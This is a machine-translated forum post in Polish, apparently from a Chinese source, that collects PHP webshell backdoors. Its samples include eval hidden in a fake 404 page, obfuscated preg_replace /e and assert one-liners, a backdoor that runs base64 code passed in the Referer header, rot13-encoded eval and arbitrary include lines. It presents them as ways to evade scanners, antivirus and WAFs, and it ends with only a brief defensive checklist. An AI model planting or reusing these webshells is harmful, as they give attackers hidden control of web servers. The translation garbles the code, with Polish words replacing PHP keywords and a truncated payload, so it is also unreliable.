Traktujemy te programy PHP backdoor z mentalnością uczenia się, a wiele kodu backdoor w PHP pozwala nam zobaczyć, jak dobrze myślą programiści.
Potężne tylne wejście PHP w jednym zdaniu
Tego typu tylne wejście pozwala na korzystanie ze stron internetowych,Administratorzy serwerów są bardzo uciążliwi i często muszą zmieniać metody, aby przeprowadzić różne detekcje, a wiele nowych technik pisania nie da się odkryć i rozwiązać zwykłymi metodami wykrywania.
Dziś policzymy kilka interesujących trojanów PHP.
1. Ukryj PHP na 404 stronach:
[mw_shl_code=php, true] <!DOCTYPE HTML PUBLICZNY "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Nie znaleziono</title>
</head><body>
<h1>Nie znaleziono</h1>
<p>Żądany adres URL nie został znaleziony na tym serwerze.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
nagłówek ('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
Strona 404 to często używany plik na stronie internetowej i niewiele osób będzie go sprawdzać i modyfikować po ogólnym zalecaniu, więc możemy użyć go do ukrycia tylnego wejścia.
2. Bezcharakterystyczne ukryte PHP w jednym zdaniu:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&preg_replace ('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Przypisz $_POST['code'] do $_SESSION['theCode'], a następnie wykonaj $_SESSION['theCode'], z wyróżnieniem, że nie ma kodu sygnatury.
Jeśli użyjesz narzędzia skanującego do sprawdzenia kodu, nie zostanie ono alarmowane i osiągnie cel.
3. Super skryte tylne wejście PHP:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Sama funkcja GET stanowi trojana;
Jak użyć:
[mw_shl_code=php, true]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Po uruchomieniu bieżący katalog generuje c.php trojan zdania, gdy parametr A zostanie oceniony, generowanie błędu Trojan nie powiodło się, a gdy zostanie asercowany, również zgłasza błąd, ale generuje konia trojańskiego, którego nie można lekceważyć.
Żądanie poziomu, kod do uruchamiania backdoor w PHP:
Metoda ta jest realizowana za pomocą dwóch plików, plik 1
[mw_shl_code=php,true]<?php
//1.php
nagłówek('Content-type:text/html; charset=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
nagłówek('Content-type:text/html; charset=utf-8′);
//要执行的代码
$code= <<<KOD
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= tablica(
CURLOPT_URL => $url,
CURLOPT_HEADER => FAŁSZ,
CURLOPT_RETURNTRANSFER => PRAWDA,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Uruchom kod kodowany base64 przez HTTP_REFERER w zapytanie HTTP, aby uzyskać efekt tylnego wejścia.
Dobrze jest wykorzystać ten pomysł, by ominąć WAF.
4.PHP narzędzie generatora tylnych wejść
weevely to specyficzny dla PHPDarmowe oprogramowanie Webshell może być używane do symulacji powłoki łącznej podobnej do telnetu, Weevely jest zwykle używany do eksploatacji programów webowych, ukrywania tylnych wejść lub stosowania metod podobnych do telnetu zamiast zarządzania strony internetowej. Kod PHP po stronie serwera generowany przez Weevely jest zakodowany w base64, więc może wprowadzać w błąd główne oprogramowanie antywirusowe i IDS, Gdy już przesłasz kod po stronie serwera, zwykle możesz uruchomić go bezpośrednio przez Weevely.
Funkcje używane w backdoorze to powszechnie wykorzystywane funkcje przetwarzania ciągów znaków, a funkcje takie jak eval i system, które są używane jako reguły inspekcyjne, nie pojawiają się bezpośrednio w kodzie, dzięki czemu plik backdoor może obejść sprawdzenie narzędzia do wyszukiwania backdoor. Skanowanie narzędziem do wykrywania sieci sieciowej grupy ciemnej pokazuje, że plik nie jest zagrożony.
Powyższe to ogólne wprowadzenie, a odpowiednie metody użycia nie zostały tu przedstawione – to prosta popularyzacja nauki.
4. Trzy zdeformowane, jednozdaniowe PHP Trojans
Pierwsza z nich:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Druga
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Wpisz http://site/2.php?_=assert&__=eval($_POST['pass']) hasło do noża kuchennego to pass.
Jeśli wykorzystasz dodatkowe dane noża kuchennego, są one bardziej ukryte, albo możesz użyć innych narzędzi do wstrzykiwania, ponieważ są one wysyłane po wejściu.
Trzeci
[mw_shl_code=php, true] ($b 4dboy= $_POST['b4dboy']) & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'dodaj'); [/mw_shl_code]
str_rot13 ("riny") to zakodowana ocena, która całkowicie unika słów kluczowych bez utraty efektu, powodując wymioty krwią!
5. Na koniec wymień kilka zaawansowanych tylnych wejść trojanów PHP:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e", $_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Podsumowując, te tylne wejścia PHP można określić jako kompletne, jeśli nie będziesz ostrożny, na pewno zostaniesz oszukany, a co jest najważniejszym priorytetem naszego artykułu dzisiaj? Kluczowe punkty znajdują się w podsumowaniu poniżej!
Jak radzić sobie z jednozdaniowym backdoorem w PHP:
Podkreślamy kilka kluczowych punktów, a jeśli czytasz ten artykuł, myślę, że nie jesteś laikiem, więc nie będę się rozwlekał:
- Zwracaj uwagę na bezpieczeństwo podczas pisania programów PHP
- Pliki logów serwera powinny być często czytane i często kopie zapasowe
- Ścisłe przydzielenie pozwoleń dla każdej lokalizacji
- Częste przeglądy bezpieczeństwa wsadowe plików dynamicznych i katalogów
- Dowiedz się, jak przeprowadzać ręczne antywirusowe "Behavioral Judgment Investigation and Killing"
- Bądźcie czujni lub infiltrujcie aktywny obóz cyberbezpieczeństwa
- Nawet funkcja może być używana jako reguła hierarchicznego przetwarzania środowiska serwera
Uważamy, że gdy jest więcej stron do zarządzania i duża ilość danych, powinniśmy rozsądnie stosować niektóre narzędzia pomocnicze, ale nie powinniśmy polegać wyłącznie na tych narzędziach – technologia ciągle się aktualizuje i ulepsza, najważniejsze jest, abyśmy nauczyli się i rozumieli sposób pisania tych potężnych osób z tylnymi wejściami, a przeniesienie ról może przynieść większy postęp.
|
Opublikowano 01.12.2014 21:41:13
